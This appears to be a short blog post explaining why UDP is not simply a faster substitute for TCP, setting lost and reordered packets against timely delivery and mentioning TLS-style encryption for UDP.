Bicycle messengers are faster than the postal service, too. Fast isn’t always what you’re looking for. In the case comparing UDP and TCP, if it was just a matter of “UDP is faster than TCP”, all the world’s web sites would be running on some protocol other than HTTP, because HTTP is rooted in TCP. Why don’t they?

Because UDP repeats packets, loses packets, repeats packets, and first of all, re-orders packets. And when your web-delivery-over-UDP protocol retransmits those lost packets, correctly orders packets, drops repeated packets, and thereby gives you the full web experience without glitches, it has re-written large chunks of the TCP stack over UDP – and done so with worse performance.

Don’t get me wrong – UDP is useful in and of itself, just not for the same tasks TCP is useful for. UDP is great for streaming audio and video, because you’d rather drop frames or snippets of sound than wait for them to arrive later (as they would do with TCP requesting retransmission, say). If you can afford to lose a few packets here and there in the interest of timely delivery of those packets that do get through, your application protocol is ideally suited to UDP. If it’s more important to occasionally wait a little in order to get the whole stream, TCP will outperform UDP every time.

In summary…

Never choose UDP over TCP because you heard it goes faster.

Choose UDP over TCP because you’d rather have packets dropped at random by the network layer than have them arrive any later than the absolute fastest they can get there.

Choose TCP over UDP because you’d rather have all the packets that were sent, in the order that they were sent, than get most / many / some of them earlier.

And whether you use TCP or UDP, you can now add TLS-style security protection.

I await the arrival of encrypted UDP traffic with some interest.